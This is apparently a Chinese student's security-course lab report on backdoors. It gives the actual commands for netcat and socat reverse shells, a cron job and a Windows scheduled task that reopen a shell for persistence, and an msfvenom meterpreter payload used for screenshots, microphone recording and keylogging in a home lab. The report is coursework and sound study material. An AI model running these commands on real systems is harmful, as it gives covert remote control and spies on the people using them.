220164323 Exp2 后门原理与实践

(1)例举你能想到的一个后门进入到你系统中的可能方式?
在使用盗版软件,盗版系统,甚至游戏外挂时,往往会让我们关闭杀毒软件,。
(2)例举你知道的后门如何启动起来(win及linux)的方式?
win:任务计划启动
linux:通过cron启动
(3)Meterpreter有哪些给你映像深刻的功能?
无论是截屏,拍照,还是录音,都会泄露隐私,
(4)如何发现自己有系统有没有被安装后门?
通过查阅任务计划以及进程里是否有可疑项,安装杀毒软件也是一种方式。

Linux:192.168.38.128
Win10:192.168.1.144

学习ncat的使用

1.Win获得Linux Shell

  • Win10打开cmd命令行,在ncat解压目录下,输入ncat.exe -l -p 43234323端口进行监听
  • 在Linux终端输入nc 192.168.1.144 4323 -e /bin/sh反弹连接Windows4323端口
  • Win10已获得Linux shell 虽然windows和Linux建立了连接,但是windows上使用正确的linux指令不会显示内容,但使用错误的linux指令会在linux上报错,我一直没有找到问题在哪,改了字符集也不会显示,在之后两者进行传输消息时,windows可以传输消息给linux,但linux上的消息不会再cmd上显示,不知道原因,如果有人可以帮我找到问题的话,请告诉我

2.Linux获得Win Shell

  • Linux下打开一个终端,输入nc -l -p 43234323端口进行监听
  • 在Win命令行输入ncat.exe -e cmd.exe 192.168.38.128 4323反弹连接Linux4323端口

  • Linux已获得Win shell

3.使用nc传输信息

  • Win10命令行输入ncat.exe -l 4323监听4323端口
  • Linux终端输入nc 192.168.1.144 4323反弹连接windows4323端口

  • 建立连接后可互传信息

4.使用nc传输文件

  • Win10命令行输入ncat.exe -l 4323 > 1.txt监听5228端口,并设置收到的文件重定向保存到1.txt
  • Linux终端输入nc 192.168.1.144 4323 < 2.txt反弹连接Win104323端口

  • Win10可收到Linux发来的文件。

实验内容

任务一:使用netcat获取主机操作Shell,cron启动

1、设定cron
Cron是Linux下的定时任务,每一分钟运行一次,根据配置文件执行预设的指令。详细说明可以"man cron"。

  • Win7中打开对端口4323端口的监听。
    ncat.exe -l -p 4323
  • Linux下使用crontab -e指令增加一条定时任务,-e表示编辑
  • 选择3,即编辑器。
    根据m分钟 h小时 dom日期 mon月 dow周几 command执行的命令的格式添加最后一行45 * * * * /bin/netcat 192.168.1.144 4323 -e /bin/sh

保存退出

任务二:使用socat获取主机操作Shell, 任务计划启动

1、新建任务计划

  • 原理: 在主控机的nc打开对4323端口的监听时,受控机的每一次锁定时都会启动ncat,相当于在cmd执行ncat.exe -e cmd.exe 192.168.1.144 4323,从而反弹连接到Linux。即Linux得到Win10 shell。
    新建触发器:当锁定任何用户的工作站时

新建操作:
启动程序:socat所在路径\socat.exe
添加参数:tcp-listen:4323 exec:cmd.exe,pty,stderr

Linux终端输入socat - tcp:192.168.1.144:4323,结果验证:

任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

  • 在Linux终端执行msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168. 38.128 LPORT=4323 -f exe > 20164323_backdoor.exe生成后门程序20164323_backdoor.exe

  • Win下执行ncat.exe -l 4323 > 20164323_backdoor.exe监听4323端口,

  • Linux终端执行nc 192.168.1.144 4323 < 20164323_backdoor.exe反弹连接Win7并传输文件20164323_backdoor.exe
  • Linux终端执行msfconsole命令,并设置好IP地址和端口号

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > show options

  • 执行监听

  • Win运行后门程序

  • Linux平台的监听进程将获得Win主机的主动连接,并得到远程控制shell。

任务四:使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

    • record_mic录制一段音频

    • screenshot进行截屏

    • 使用screenshot指令可以进行截屏

    • 在kali中使用keyscan_start指令开始,在windows中记录下击键的过程,使用keyscan_dump指令读取击键的记录:
    • 使用getuid指令查看当前用户

    • 实验中遇到的问题

      虽然windows和Linux建立了连接,但是windows上使用正确的linux指令不会显示内容,但使用错误的linux指令会在linux上报错,我一直没有找到问题在哪,改了字符集也不会显示,在之后两者进行传输消息时,windows可以传输消息给linux,但linux上的消息不会在cmd上显示,还有生成后门时,弄混linux和windows的Ip地址造成很多次的监听错误,还有碰到防火墙还有杀毒软件的问题,之前生成的后门都被杀软杀掉了,而且没要找到传输过来的软件,最后我是利用杀毒软件找到的传输文件。

      实验感想

    • 这次的实验非常有意思,但觉得也很危险,通过这次实验更加了解了后门,同时加深了自己的警惕意识。黑客可能通过后门控制我们的电脑,通过截屏,击键记录还有摄像头来了解我们的信息,我们在平时一定要注意防范。

Exp2 后门原理与实践 20164323段钊阳的更多相关文章

  1. Exp3 免杀原理与实践 20164323段钊阳

    网络对抗技术 20164323 Exp3 免杀原理与实践 免杀 一般是对恶意软件做处理,让它不被杀毒软件所检测.也是渗透测试中需要使用到的技术. 要做好免杀,就时清楚杀毒软件(恶意软件检测工具)是如何 ...

  2. 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...

  3. 2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...

  4. 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践

    - 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践 - 实验任务 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主 ...

  5. 2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践 一.实验要求 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用soc ...

  6. 2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165235<网络对抗技术>Exp2 后门原理与实践 实验内容 1.使用netcat获取主机操作Shell,cron启动 2.使用socat获取主机操作Shel ...

  7. 2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践 后门的基本概念 常用后门工具 netcat Win获得Linux Shell Linux获得Win Shell Met ...

  8. 2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 下载免费应用的时候会有绑定木马. 浏览某些网页时会有内 ...

  9. 2018-2019-2 网络对抗技术 20165336 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165336 Exp2 后门原理与实践 1.基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 下载自己不熟悉的软件时含有病毒. 网络钓鱼, ...

随机推荐

  1. requests接口测试——身份认证

    当调用者访问接口时需要进行用户认证(用户名密码的登录),只有通过了认证才允许调用者访问接口. 1.基本身份认证 许多要求身份认证的web服务都接受HTTP Basic Auth.这是最简单的一种身份认 ...

  2. react之echarts数据更新

    react之echarts数据更新 在使用setState更新数据时,如果要将图标更新,需要做一些简单的封装,代码如下: import React, { Component } from 'react ...

  3. Remove “Quick Access” entry in Eclipse Juno

    Here is a quick hack which doesn't require any plugin installation, instead you just need to add a f ...

  4. list.contains

    list.contains(o),系统会对list中的每个元素e调用o.equals(e),方法,加入list中有n个元素,那么会调用n次o.equals(e),只要有一次o.equals(e)返回了 ...

  5. 怎样查看lInux系统中的所有运行进程

    可以使用ps命令.它能显示当前运行中进程的相关信息,包括进程的PID.Linux和UNIX都支持ps命令,显示所有运行中进程的相关信息. ps命令能提供一份当前进程的快照.如果想状态可以自动刷新,可以 ...

  6. Zookeeper 源码(四)Zookeeper 服务端源码

    Zookeeper 源码(四)Zookeeper 服务端源码 Zookeeper 服务端的启动入口为 QuorumPeerMain public static void main(String[] a ...

  7. 从iOS 11 UI Kit中谈谈iOS 11的新变化

    北京时间9月20日凌晨1点,iOS 11终于迎来了正式版的推送,相信各位小伙伴已经在第一时间进行了升级.iOS 11毫无疑问是一次大规模的系统更新,UI.系统内核.锁屏等多方面都进行了不同程度的改进. ...

  8. Redis Quick Start [熟练版]

    一.下载解压 wget http://download.redis.io/redis-stable.tar.gztar xvzf redis-stable.tar.gzcd redis-stable ...

  9. Deep learning for visual understanding: A review

    https://www.sciencedirect.com/science/article/pii/S0924271618301291?dgcid=raven_sd_recommender_email ...

  10. 利用JS判断浏览器版本

    function checkBrowser() { var browserName = navigator.userAgent.toLowerCase(); //var ua = navigator. ...